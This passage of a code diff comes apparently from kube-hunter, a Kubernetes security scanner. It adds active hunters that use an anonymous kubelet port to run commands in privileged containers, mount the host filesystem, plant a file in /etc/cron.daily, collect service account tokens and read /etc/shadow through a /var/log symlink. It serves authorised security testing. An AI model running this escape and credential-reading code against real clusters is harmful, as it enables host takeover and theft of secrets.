+ f"\n\nContainer name: {container_name}"
|
||||
+ f"\n\nService account token: {service_account_token}"
|
||||
+ f"\nEnvironment variables: {environment_variables}"
|
||||
)
|
||||
|
||||
first_check = container_data.get("securityContext", {}).get("privileged")
|
||||
|
||||
first_subset = container_data.get("securityContext", {})
|
||||
second_subset = first_subset.get("capabilities", {})
|
||||
data_for_second_check = second_subset.get("add", [])
|
||||
|
||||
second_check = "SYS_ADMIN" in data_for_second_check
|
||||
|
||||
if first_check or second_check:
|
||||
exposed_existing_privileged_containers.append(
|
||||
{
|
||||
"pod_namespace": pod_namespace,
|
||||
"pod_id": pod_id,
|
||||
"container_name": container_name,
|
||||
"service_account_token": service_account_token,
|
||||
"environment_variables": environment_variables,
|
||||
}
|
||||
)
|
||||
|
||||
if temp_message:
|
||||
message = "The following containers have been successfully breached." + temp_message
|
||||
|
||||
self.event.evidence = f"{message}"
|
||||
|
||||
if exposed_existing_privileged_containers:
|
||||
self.publish_event(
|
||||
ExposedExistingPrivilegedContainersViaSecureKubeletPort(
|
||||
exposed_existing_privileged_containers=exposed_existing_privileged_containers
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort)
|
||||
class MaliciousIntentViaSecureKubeletPort(ActiveHunter):
|
||||
"""Malicious Intent Via Secure Kubelet Port
|
||||
Attempts to demonstrate that a malicious actor can leverage existing privileged containers
|
||||
exposed via the kubelet's secure port, due to anonymous auth enabled misconfiguration,
|
||||
such that a process can be started or modified on the host.
|
||||
"""
|
||||
|
||||
def __init__(self, event, seconds_to_wait_for_os_command=1):
|
||||
self.event = event
|
||||
self.base_url = f"https://{self.event.host}:10250/"
|
||||
self.seconds_to_wait_for_os_command = seconds_to_wait_for_os_command
|
||||
self.number_of_rm_attempts = 5
|
||||
self.number_of_rmdir_attempts = 5
|
||||
self.number_of_umount_attempts = 5
|
||||
|
||||
def post_request(self, url, params, verify=False):
|
||||
config = get_config()
|
||||
try:
|
||||
response_text = self.event.session.post(
|
||||
url, verify, params=params, timeout=config.network_timeout
|
||||
).text.rstrip()
|
||||
|
||||
return response_text
|
||||
except Exception as ex:
|
||||
logging.debug("Exception: " + str(ex))
|
||||
return "Exception: " + str(ex)
|
||||
|
||||
def cat_command(self, run_request_url, full_file_path):
|
||||
return self.post_request(run_request_url, {"cmd": f"cat {full_file_path}"})
|
||||
|
||||
def clean_attacked_exposed_existing_privileged_container(
|
||||
self,
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory_created,
|
||||
file_created,
|
||||
number_of_rm_attempts,
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
):
|
||||
|
||||
self.rm_command(
|
||||
run_request_url,
|
||||
f"{directory_created}/etc/cron.daily/{file_created}",
|
||||
number_of_rm_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
self.umount_command(
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory_created,
|
||||
number_of_umount_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
self.rmdir_command(
|
||||
run_request_url,
|
||||
directory_created,
|
||||
number_of_rmdir_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
def check_file_exists(self, run_request_url, file):
|
||||
file_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=file)
|
||||
|
||||
return ProveAnonymousAuth.has_no_error_nor_exception(file_exists)
|
||||
|
||||
def rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command):
|
||||
if self.check_file_exists(run_request_url, file_to_remove):
|
||||
for _ in range(number_of_rm_attempts):
|
||||
command_execution_outcome = self.post_request(run_request_url, {"cmd": f"rm -f {file_to_remove}"})
|
||||
|
||||
if seconds_to_wait_for_os_command:
|
||||
time.sleep(seconds_to_wait_for_os_command)
|
||||
|
||||
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
|
||||
second_check = self.check_file_exists(run_request_url, file_to_remove)
|
||||
|
||||
if first_check and not second_check:
|
||||
return True
|
||||
|
||||
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
|
||||
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
|
||||
logger.warning(
|
||||
"kube-hunter: "
|
||||
+ "POD="
|
||||
+ pod_id
|
||||
+ ", "
|
||||
+ "CONTAINER="
|
||||
+ container_name
|
||||
+ " - Unable to remove file: "
|
||||
+ file_to_remove
|
||||
)
|
||||
|
||||
return False
|
||||
|
||||
def chmod_command(self, run_request_url, permissions, file):
|
||||
return self.post_request(run_request_url, {"cmd": f"chmod {permissions} {file}"})
|
||||
|
||||
def touch_command(self, run_request_url, file_to_create):
|
||||
return self.post_request(run_request_url, {"cmd": f"touch {file_to_create}"})
|
||||
|
||||
def attack_exposed_existing_privileged_container(
|
||||
self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None
|
||||
):
|
||||
if file_name is None:
|
||||
file_name = "kube-hunter" + str(uuid.uuid1())
|
||||
|
||||
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"
|
||||
|
||||
file_created = self.touch_command(run_request_url, file_name_with_path)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(file_created):
|
||||
permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(permissions_changed):
|
||||
return {"result": True, "file_created": file_name}
|
||||
|
||||
self.rm_command(run_request_url, file_name_with_path, number_of_rm_attempts, seconds_to_wait_for_os_command)
|
||||
|
||||
return {"result": False}
|
||||
|
||||
def check_directory_exists(self, run_request_url, directory):
|
||||
directory_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=directory)
|
||||
|
||||
return ProveAnonymousAuth.has_no_error_nor_exception(directory_exists)
|
||||
|
||||
def rmdir_command(
|
||||
self,
|
||||
run_request_url,
|
||||
directory_to_remove,
|
||||
number_of_rmdir_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
):
|
||||
if self.check_directory_exists(run_request_url, directory_to_remove):
|
||||
for _ in range(number_of_rmdir_attempts):
|
||||
command_execution_outcome = self.post_request(run_request_url, {"cmd": f"rmdir {directory_to_remove}"})
|
||||
|
||||
if seconds_to_wait_for_os_command:
|
||||
time.sleep(seconds_to_wait_for_os_command)
|
||||
|
||||
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
|
||||
second_check = self.check_directory_exists(run_request_url, directory_to_remove)
|
||||
|
||||
if first_check and not second_check:
|
||||
return True
|
||||
|
||||
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
|
||||
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
|
||||
logger.warning(
|
||||
"kube-hunter: "
|
||||
+ "POD="
|
||||
+ pod_id
|
||||
+ ", "
|
||||
+ "CONTAINER="
|
||||
+ container_name
|
||||
+ " - Unable to remove directory: "
|
||||
+ directory_to_remove
|
||||
)
|
||||
|
||||
return False
|
||||
|
||||
def ls_command(self, run_request_url, file_or_directory):
|
||||
return self.post_request(run_request_url, {"cmd": f"ls {file_or_directory}"})
|
||||
|
||||
def umount_command(
|
||||
self,
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory,
|
||||
number_of_umount_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
):
|
||||
# Note: the logic implemented proved more reliable than using "df"
|
||||
# command to resolve for mounted systems/partitions.
|
||||
current_files_and_directories = self.ls_command(run_request_url, directory)
|
||||
|
||||
if self.ls_command(run_request_url, directory) == current_files_and_directories:
|
||||
for _ in range(number_of_umount_attempts):
|
||||
# Ref: http://man7.org/linux/man-pages/man2/umount.2.html
|
||||
command_execution_outcome = self.post_request(
|
||||
run_request_url, {"cmd": f"umount {file_system_or_partition} {directory}"}
|
||||
)
|
||||
|
||||
if seconds_to_wait_for_os_command:
|
||||
time.sleep(seconds_to_wait_for_os_command)
|
||||
|
||||
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
|
||||
second_check = self.ls_command(run_request_url, directory) != current_files_and_directories
|
||||
|
||||
if first_check and second_check:
|
||||
return True
|
||||
|
||||
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
|
||||
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
|
||||
logger.warning(
|
||||
"kube-hunter: "
|
||||
+ "POD="
|
||||
+ pod_id
|
||||
+ ", "
|
||||
+ "CONTAINER="
|
||||
+ container_name
|
||||
+ " - Unable to unmount "
|
||||
+ file_system_or_partition
|
||||
+ " at: "
|
||||
+ directory
|
||||
)
|
||||
|
||||
return False
|
||||
|
||||
def mount_command(self, run_request_url, file_system_or_partition, directory):
|
||||
# Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
|
||||
return self.post_request(run_request_url, {"cmd": f"mount {file_system_or_partition} {directory}"})
|
||||
|
||||
def mkdir_command(self, run_request_url, directory_to_create):
|
||||
# Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
|
||||
return self.post_request(run_request_url, {"cmd": f"mkdir {directory_to_create}"})
|
||||
|
||||
def findfs_command(self, run_request_url, file_system_or_partition_type, file_system_or_partition):
|
||||
# Ref: http://man7.org/linux/man-pages/man8/findfs.8.html
|
||||
return self.post_request(
|
||||
run_request_url, {"cmd": f"findfs {file_system_or_partition_type}{file_system_or_partition}"}
|
||||
)
|
||||
|
||||
def get_root_values(self, command_line):
|
||||
for command in command_line.split(" "):
|
||||
# Check for variable-definition commands as there can be commands which don't define variables.
|
||||
if "=" in command:
|
||||
split = command.split("=")
|
||||
if split[0] == "root":
|
||||
if len(split) > 2:
|
||||
# Potential valid scenario: root=LABEL=example
|
||||
root_value_type = split[1] + "="
|
||||
root_value = split[2]
|
||||
|
||||
return root_value, root_value_type
|
||||
else:
|
||||
root_value_type = ""
|
||||
root_value = split[1]
|
||||
|
||||
return root_value, root_value_type
|
||||
|
||||
return None, None
|
||||
|
||||
def process_exposed_existing_privileged_container(
|
||||
self,
|
||||
run_request_url,
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
directory_to_create=None,
|
||||
):
|
||||
if directory_to_create is None:
|
||||
directory_to_create = "/kube-hunter_" + str(uuid.uuid1())
|
||||
|
||||
# /proc/cmdline - This file shows the parameters passed to the kernel at the time it is started.
|
||||
command_line = self.cat_command(run_request_url, "/proc/cmdline")
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(command_line):
|
||||
if len(command_line.split(" ")) > 0:
|
||||
root_value, root_value_type = self.get_root_values(command_line)
|
||||
|
||||
# Move forward only when the "root" variable value was actually defined.
|
||||
if root_value:
|
||||
if root_value_type:
|
||||
file_system_or_partition = self.findfs_command(run_request_url, root_value_type, root_value)
|
||||
else:
|
||||
file_system_or_partition = root_value
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(file_system_or_partition):
|
||||
directory_created = self.mkdir_command(run_request_url, directory_to_create)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(directory_created):
|
||||
directory_created = directory_to_create
|
||||
|
||||
mounted_file_system_or_partition = self.mount_command(
|
||||
run_request_url, file_system_or_partition, directory_created
|
||||
)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(mounted_file_system_or_partition):
|
||||
host_name = self.cat_command(run_request_url, f"{directory_created}/etc/hostname")
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(host_name):
|
||||
return {
|
||||
"result": True,
|
||||
"file_system_or_partition": file_system_or_partition,
|
||||
"directory_created": directory_created,
|
||||
}
|
||||
|
||||
self.umount_command(
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory_created,
|
||||
number_of_umount_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
self.rmdir_command(
|
||||
run_request_url,
|
||||
directory_created,
|
||||
number_of_rmdir_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
return {"result": False}
|
||||
|
||||
def execute(self, directory_to_create=None, file_name=None):
|
||||
temp_message = ""
|
||||
|
||||
for exposed_existing_privileged_containers in self.event.exposed_existing_privileged_containers:
|
||||
pod_namespace = exposed_existing_privileged_containers["pod_namespace"]
|
||||
pod_id = exposed_existing_privileged_containers["pod_id"]
|
||||
container_name = exposed_existing_privileged_containers["container_name"]
|
||||
|
||||
run_request_url = self.base_url + f"run/{pod_namespace}/{pod_id}/{container_name}"
|
||||
|
||||
is_exposed_existing_privileged_container_privileged = self.process_exposed_existing_privileged_container(
|
||||
run_request_url,
|
||||
self.number_of_umount_attempts,
|
||||
self.number_of_rmdir_attempts,
|
||||
self.seconds_to_wait_for_os_command,
|
||||
directory_to_create,
|
||||
)
|
||||
|
||||
if is_exposed_existing_privileged_container_privileged["result"]:
|
||||
file_system_or_partition = is_exposed_existing_privileged_container_privileged[
|
||||
"file_system_or_partition"
|
||||
]
|
||||
directory_created = is_exposed_existing_privileged_container_privileged["directory_created"]
|
||||
|
||||
# Execute attack attempt: start/modify process in host.
|
||||
attack_successful_on_exposed_privileged_container = self.attack_exposed_existing_privileged_container(
|
||||
run_request_url,
|
||||
directory_created,
|
||||
self.number_of_rm_attempts,
|
||||
self.seconds_to_wait_for_os_command,
|
||||
file_name,
|
||||
)
|
||||
|
||||
if attack_successful_on_exposed_privileged_container["result"]:
|
||||
file_created = attack_successful_on_exposed_privileged_container["file_created"]
|
||||
|
||||
self.clean_attacked_exposed_existing_privileged_container(
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory_created,
|
||||
file_created,
|
||||
self.number_of_rm_attempts,
|
||||
self.number_of_umount_attempts,
|
||||
self.number_of_rmdir_attempts,
|
||||
self.seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
temp_message += "\n\nPod namespace: {}\n\nPod ID: {}\n\nContainer name: {}".format(
|
||||
pod_namespace, pod_id, container_name
|
||||
)
|
||||
|
||||
if temp_message:
|
||||
message = (
|
||||
"The following exposed existing privileged containers"
|
||||
+ " have been successfully abused by starting/modifying a process in the host."
|
||||
+ temp_message
|
||||
)
|
||||
|
||||
self.event.evidence = f"{message}"
|
||||
else:
|
||||
message = (
|
||||
"The following exposed existing privileged containers"
|
||||
+ " were not successfully abused by starting/modifying a process in the host."
|
||||
+ "Keep in mind that attackers might use other methods to attempt to abuse them."
|
||||
+ temp_message
|
||||
)
|
||||
|
||||
self.event.evidence = f"{message}"
|
||||
|
||||
|
||||
@handler.subscribe(ExposedRunHandler)
|
||||
class ProveRunHandler(ActiveHunter):
|
||||
"""Kubelet Run Hunter
|
||||
@@ -453,18 +1048,22 @@ class ProveRunHandler(ActiveHunter):
|
||||
cmd=command,
|
||||
)
|
||||
return self.event.session.post(
|
||||
f"{self.base_path}/{run_url}", verify=False, timeout=config.network_timeout,
|
||||
f"{self.base_path}/{run_url}",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
r = self.event.session.get(
|
||||
self.base_path + KubeletHandlers.PODS.value, verify=False, timeout=config.network_timeout,
|
||||
f"{self.base_path}/" + KubeletHandlers.PODS.value,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
if "items" in r.text:
|
||||
pods_data = r.json()["items"]
|
||||
for pod_data in pods_data:
|
||||
container_data = next(pod_data["spec"]["containers"])
|
||||
container_data = pod_data["spec"]["containers"][0]
|
||||
if container_data:
|
||||
output = self.run(
|
||||
"uname -a",
|
||||
@@ -493,12 +1092,14 @@ class ProveContainerLogsHandler(ActiveHunter):
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
pods_raw = self.event.session.get(
|
||||
self.base_url + KubeletHandlers.PODS.value, verify=False, timeout=config.network_timeout,
|
||||
self.base_url + KubeletHandlers.PODS.value,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
if "items" in pods_raw:
|
||||
pods_data = json.loads(pods_raw)["items"]
|
||||
for pod_data in pods_data:
|
||||
container_data = next(pod_data["spec"]["containers"])
|
||||
container_data = pod_data["spec"]["containers"][0]
|
||||
if container_data:
|
||||
container_name = container_data["name"]
|
||||
output = requests.get(
|
||||
@@ -532,11 +1133,16 @@ class ProveSystemLogs(ActiveHunter):
|
||||
f"{self.base_url}/" + KubeletHandlers.LOGS.value.format(path="audit/audit.log"),
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
logger.debug(f"Audit log of host {self.event.host}: {audit_logs[:10]}")
|
||||
# iterating over proctitles and converting them into readable strings
|
||||
proctitles = []
|
||||
for proctitle in re.findall(r"proctitle=(\w+)", audit_logs):
|
||||
proctitles.append(bytes.fromhex(proctitle).decode("utf-8").replace("\x00", " "))
|
||||
self.event.proctitles = proctitles
|
||||
self.event.evidence = f"audit log: {proctitles}"
|
||||
)
|
||||
|
||||
# TODO: add more methods for proving system logs
|
||||
if audit_logs.status_code == requests.status_codes.codes.OK:
|
||||
logger.debug(f"Audit log of host {self.event.host}: {audit_logs.text[:10]}")
|
||||
# iterating over proctitles and converting them into readable strings
|
||||
proctitles = []
|
||||
for proctitle in re.findall(r"proctitle=(\w+)", audit_logs.text):
|
||||
proctitles.append(bytes.fromhex(proctitle).decode("utf-8").replace("\x00", " "))
|
||||
self.event.proctitles = proctitles
|
||||
self.event.evidence = f"audit log: {proctitles}"
|
||||
else:
|
||||
self.event.evidence = "Could not parse system logs"
|
||||
|
||||
@@ -25,10 +25,14 @@ class WriteMountToVarLog(Vulnerability, Event):
|
||||
|
||||
def __init__(self, pods):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "Pod With Mount To /var/log", category=PrivilegeEscalation, vid="KHV047",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Pod With Mount To /var/log",
|
||||
category=PrivilegeEscalation,
|
||||
vid="KHV047",
|
||||
)
|
||||
self.pods = pods
|
||||
self.evidence = "pods: {}".format(", ".join((pod["metadata"]["name"] for pod in self.pods)))
|
||||
self.evidence = "pods: {}".format(", ".join(pod["metadata"]["name"] for pod in self.pods))
|
||||
|
||||
|
||||
class DirectoryTraversalWithKubelet(Vulnerability, Event):
|
||||
@@ -37,10 +41,13 @@ class DirectoryTraversalWithKubelet(Vulnerability, Event):
|
||||
|
||||
def __init__(self, output):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "Root Traversal Read On The Kubelet", category=PrivilegeEscalation,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Root Traversal Read On The Kubelet",
|
||||
category=PrivilegeEscalation,
|
||||
)
|
||||
self.output = output
|
||||
self.evidence = "output: {}".format(self.output)
|
||||
self.evidence = f"output: {self.output}"
|
||||
|
||||
|
||||
@handler.subscribe(ExposedPodsHandler)
|
||||
@@ -82,7 +89,10 @@ class ProveVarLogMount(ActiveHunter):
|
||||
|
||||
def run(self, command, container):
|
||||
run_url = KubeletHandlers.RUN.value.format(
|
||||
podNamespace=container["namespace"], podID=container["pod"], containerName=container["name"], cmd=command,
|
||||
podNamespace=container["namespace"],
|
||||
podID=container["pod"],
|
||||
containerName=container["name"],
|
||||
cmd=command,
|
||||
)
|
||||
return self.event.session.post(f"{self.base_path}/{run_url}", verify=False).text
|
||||
|
||||
@@ -91,7 +101,9 @@ class ProveVarLogMount(ActiveHunter):
|
||||
config = get_config()
|
||||
logger.debug("accessing /pods manually on ProveVarLogMount")
|
||||
pods = self.event.session.get(
|
||||
f"{self.base_path}/" + KubeletHandlers.PODS.value, verify=False, timeout=config.network_timeout,
|
||||
f"{self.base_path}/" + KubeletHandlers.PODS.value,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).json()["items"]
|
||||
for pod in pods:
|
||||
volume = VarLogMountHunter(ExposedPodsHandler(pods=pods)).has_write_mount_to(pod, "/var/log")
|
||||
@@ -117,7 +129,9 @@ class ProveVarLogMount(ActiveHunter):
|
||||
path=re.sub(r"^/var/log", "", host_path) + symlink_name
|
||||
)
|
||||
content = self.event.session.get(
|
||||
f"{self.base_path}/{path_in_logs_endpoint}", verify=False, timeout=config.network_timeout,
|
||||
f"{self.base_path}/{path_in_logs_endpoint}",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
# removing symlink
|
||||
self.run(f"rm {mount_path}/{symlink_name}", container=container)
|
||||
@@ -134,7 +148,10 @@ class ProveVarLogMount(ActiveHunter):
|
||||
}
|
||||
try:
|
||||
output = self.traverse_read(
|
||||
"/etc/shadow", container=cont, mount_path=mount_path, host_path=volume["hostPath"]["path"],
|
||||
"/etc/shadow",
|
||||
container=cont,
|
||||
mount_path=mount_path,
|
||||
host_path=volume["hostPath"]["path"],
|
||||
)
|
||||
self.publish_event(DirectoryTraversalWithKubelet(output=output))
|
||||
except Exception:
|
||||
|
||||
@@ -23,7 +23,11 @@ class KubeProxyExposed(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "Proxy Exposed", category=InformationDisclosure, vid="KHV049",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Proxy Exposed",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV049",
|
||||
)
|
||||
|
||||
|
||||
@@ -89,7 +93,9 @@ class ProveProxyExposed(ActiveHunter):
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
version_metadata = requests.get(
|
||||
f"http://{self.event.host}:{self.event.port}/version", verify=False, timeout=config.network_timeout,
|
||||
f"http://{self.event.host}:{self.event.port}/version",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).json()
|
||||
if "buildDate" in version_metadata:
|
||||
self.event.evidence = "build date: {}".format(version_metadata["buildDate"])
|
||||
@@ -107,11 +113,15 @@ class K8sVersionDisclosureProve(ActiveHunter):
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
version_metadata = requests.get(
|
||||
f"http://{self.event.host}:{self.event.port}/version", verify=False, timeout=config.network_timeout,
|
||||
f"http://{self.event.host}:{self.event.port}/version",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).json()
|
||||
if "gitVersion" in version_metadata:
|
||||
self.publish_event(
|
||||
K8sVersionDisclosure(
|
||||
version=version_metadata["gitVersion"], from_endpoint="/version", extra_info="on kube-proxy",
|
||||
version=version_metadata["gitVersion"],
|
||||
from_endpoint="/version",
|
||||
extra_info="on kube-proxy",
|
||||
)
|
||||
)
|
||||
|
||||
@@ -28,7 +28,10 @@ class SecretsAccess(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, component=KubernetesCluster, name="Access to pod's secrets", category=AccessRisk,
|
||||
self,
|
||||
component=KubernetesCluster,
|
||||
name="Access to pod's secrets",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
@@ -7,6 +7,9 @@ from kube_hunter.modules.report.collector import (
|
||||
vulnerabilities_lock,
|
||||
)
|
||||
|
||||
BASE_KB_LINK = "https://avd.aquasec.com/"
|
||||
FULL_KB_LINK = "https://avd.aquasec.com/kube-hunter/{vid}/"
|
||||
|
||||
|
||||
class BaseReporter:
|
||||
def get_nodes(self):
|
||||
@@ -38,6 +41,7 @@ class BaseReporter:
|
||||
"vulnerability": vuln.get_name(),
|
||||
"description": vuln.explain(),
|
||||
"evidence": str(vuln.evidence),
|
||||
"avd_reference": FULL_KB_LINK.format(vid=vuln.get_vid().lower()),
|
||||
"hunter": vuln.hunter.get_name(),
|
||||
}
|
||||
for vuln in vulnerabilities
|
||||
@@ -63,6 +67,4 @@ class BaseReporter:
|
||||
if statistics:
|
||||
report["hunter_statistics"] = self.get_hunter_statistics()
|
||||
|
||||
report["kburl"] = "https://aquasecurity.github.io/kube-hunter/kb/{vid}"
|
||||
|
||||
return report
|
||||
|
||||
@@ -12,7 +12,10 @@ class HTTPDispatcher:
|
||||
dispatch_url = os.environ.get("KUBEHUNTER_HTTP_DISPATCH_URL", "https://localhost/")
|
||||
try:
|
||||
r = requests.request(
|
||||
dispatch_method, dispatch_url, json=report, headers={"Content-Type": "application/json"},
|
||||
dispatch_method,
|
||||
dispatch_url,
|
||||
json=report,
|
||||
headers={"Content-Type": "application/json"},
|
||||
)
|
||||
r.raise_for_status()
|
||||
logger.info(f"Report was dispatched to: {dispatch_url}")
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
from prettytable import ALL, PrettyTable
|
||||
|
||||
from kube_hunter.modules.report.base import BaseReporter
|
||||
from kube_hunter.modules.report.base import BaseReporter, BASE_KB_LINK
|
||||
from kube_hunter.modules.report.collector import (
|
||||
services,
|
||||
vulnerabilities,
|
||||
@@ -9,9 +9,8 @@ from kube_hunter.modules.report.collector import (
|
||||
vulnerabilities_lock,
|
||||
)
|
||||
|
||||
EVIDENCE_PREVIEW = 40
|
||||
EVIDENCE_PREVIEW = 100
|
||||
MAX_TABLE_WIDTH = 20
|
||||
KB_LINK = "https://github.com/aquasecurity/kube-hunter/tree/master/docs/_kb"
|
||||
|
||||
|
||||
class PlainReporter(BaseReporter):
|
||||
@@ -60,7 +59,7 @@ class PlainReporter(BaseReporter):
|
||||
if service.event_id not in id_memory:
|
||||
nodes_table.add_row(["Node/Master", service.host])
|
||||
id_memory.add(service.event_id)
|
||||
nodes_ret = "\nNodes\n{}\n".format(nodes_table)
|
||||
nodes_ret = f"\nNodes\n{nodes_table}\n"
|
||||
services_lock.release()
|
||||
return nodes_ret
|
||||
|
||||
@@ -114,7 +113,7 @@ class PlainReporter(BaseReporter):
|
||||
return (
|
||||
"\nVulnerabilities\n"
|
||||
"For further information about a vulnerability, search its ID in: \n"
|
||||
f"{KB_LINK}\n{vuln_table}\n"
|
||||
f"{BASE_KB_LINK}\n{vuln_table}\n"
|
||||
)
|
||||
|
||||
def hunters_table(self):
|
||||
|
||||
23
kube_hunter/plugins/__init__.py
Normal file
23
kube_hunter/plugins/__init__.py
Normal file
@@ -0,0 +1,23 @@
|
||||
import pluggy
|
||||
|
||||
from kube_hunter.plugins import hookspecs
|
||||
|
||||
hookimpl = pluggy.HookimplMarker("kube-hunter")
|
||||
|
||||
|
||||
def initialize_plugin_manager():
|
||||
"""
|
||||
Initializes and loads all default and setup implementations for registered plugins
|
||||
|
||||
@return: initialized plugin manager
|
||||
"""
|
||||
pm = pluggy.PluginManager("kube-hunter")
|
||||
pm.add_hookspecs(hookspecs)
|
||||
pm.load_setuptools_entrypoints("kube_hunter")
|
||||
|
||||
# default registration of builtin implemented plugins
|
||||
from kube_hunter.conf import parser
|
||||
|
||||
pm.register(parser)
|
||||
|
||||
return pm
|
||||
24
kube_hunter/plugins/hookspecs.py
Normal file
24
kube_hunter/plugins/hookspecs.py
Normal file
@@ -0,0 +1,24 @@
|
||||
import pluggy
|
||||
from argparse import ArgumentParser
|
||||
|
||||
hookspec = pluggy.HookspecMarker("kube-hunter")
|
||||
|
||||
|
||||
@hookspec
|
||||
def parser_add_arguments(parser: ArgumentParser):
|
||||
"""Add arguments to the ArgumentParser.
|
||||
|
||||
If a plugin requires an aditional argument, it should implement this hook
|
||||
and add the argument to the Argument Parser
|
||||
|
||||
@param parser: an ArgumentParser, calls parser.add_argument on it
|
||||
"""
|
||||
|
||||
|
||||
@hookspec
|
||||
def load_plugin(args):
|
||||
"""Plugins that wish to execute code after the argument parsing
|
||||
should implement this hook.
|
||||
|
||||
@param args: all parsed arguments passed to kube-hunter
|
||||
"""
|
||||
3
pyinstaller_hooks/hook-prettytable.py
Normal file
3
pyinstaller_hooks/hook-prettytable.py
Normal file
@@ -0,0 +1,3 @@
|
||||
from PyInstaller.utils.hooks import collect_all
|
||||
|
||||
datas, binaries, hiddenimports = collect_all("prettytable")
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
flake8
|
||||
pytest >= 2.9.1
|
||||
requests-mock
|
||||
requests-mock >= 1.8
|
||||
coverage < 5.0
|
||||
pytest-cov
|
||||
setuptools >= 30.3.0
|
||||
@@ -14,3 +14,4 @@ black
|
||||
pre-commit
|
||||
flake8-bugbear
|
||||
flake8-mypy
|
||||
pluggy
|
||||
|
||||
@@ -22,6 +22,8 @@ classifiers =
|
||||
Programming Language :: Python :: 3.6
|
||||
Programming Language :: Python :: 3.7
|
||||
Programming Language :: Python :: 3.8
|
||||
Programming Language :: Python :: 3.9
|
||||
Programming Language :: Python :: 3 :: Only
|
||||
Topic :: Security
|
||||
|
||||
[options]
|
||||
@@ -38,6 +40,7 @@ install_requires =
|
||||
future
|
||||
packaging
|
||||
dataclasses
|
||||
pluggy
|
||||
setup_requires =
|
||||
setuptools>=30.3.0
|
||||
setuptools_scm
|
||||
|
||||
2
setup.py
2
setup.py
@@ -41,6 +41,8 @@ class PyInstallerCommand(Command):
|
||||
cfg.read("setup.cfg")
|
||||
command = [
|
||||
"pyinstaller",
|
||||
"--additional-hooks-dir",
|
||||
"pyinstaller_hooks",
|
||||
"--clean",
|
||||
"--onefile",
|
||||
"--name",
|
||||
|
||||
@@ -11,12 +11,13 @@ def test_setup_logger_level():
|
||||
("NOTEXISTS", logging.INFO),
|
||||
("BASIC_FORMAT", logging.INFO),
|
||||
]
|
||||
logFile = None
|
||||
for level, expected in test_cases:
|
||||
setup_logger(level)
|
||||
setup_logger(level, logFile)
|
||||
actual = logging.getLogger().getEffectiveLevel()
|
||||
assert actual == expected, f"{level} level should be {expected} (got {actual})"
|
||||
|
||||
|
||||
